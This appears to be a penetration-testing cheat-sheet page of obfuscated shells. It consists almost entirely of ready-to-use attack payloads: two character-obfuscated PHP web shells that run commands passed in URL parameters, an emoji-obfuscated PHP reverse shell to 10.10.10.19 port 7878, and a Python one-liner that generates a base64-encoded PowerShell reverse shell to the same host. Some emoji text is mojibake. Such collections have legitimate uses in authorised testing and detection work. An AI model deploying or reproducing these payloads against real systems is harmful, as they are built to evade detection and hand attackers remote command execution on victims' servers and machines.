Obfuscated Shells
Web Shells
Obfuscated PHP
#Usage: http://target.com/path/to/shell.php?0=command
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
#Usage: http://target.com/path/to/shell.php?_=function&__=argument
#Example: http://target.com/path/to/shell.php?_=system&__=ls
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Reverse Shells
Emoji PHP
php -r '$๐="1";$๐="2";$๐
="3";$๐="4";$๐="5";$๐="6";$๐="7";$๐="8";$๐="9";$๐="0";$๐คข=" ";$๐ค="<";$๐ค =">";$๐ฑ="-";$๐ต="&";$๐คฉ="i";$๐ค=".";$๐คจ="/";$๐ฅฐ="a";$๐="b";$๐ถ="i";$๐="h";$๐="c";$๐คฃ="d";$๐="e";$๐="f";$๐="k";$๐="n";$๐="o";$๐="p";$๐ค="s";$๐="x";$๐ = $๐. $๐ค. $๐. $๐. $๐. $๐. $๐. $๐. $๐;$๐ = "10.10.10.19";$๐ป = 7878;$๐ = "sh". $๐คข. $๐ฑ. $๐คฉ. $๐คข. $๐ค. $๐ต. $๐
. $๐คข. $๐ค . $๐ต. $๐
. $๐คข. $๐. $๐ค . $๐ต. $๐
;$๐คฃ = $๐($๐,$๐ป);$๐ฝ = $๐. $๐. $๐. $๐;$๐ฝ($๐);'
Powershell b64 encoded
#Execute in your linux to generate your Powershell Reverse Shell
python -c $'import base64; IP = "10.10.10.19"; PORT = "7878"; payload = \'$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\' % (IP, int(PORT)); print("powershell -e " + base64.b64encode(payload.encode("utf16")[2:]).decode());'
Last updated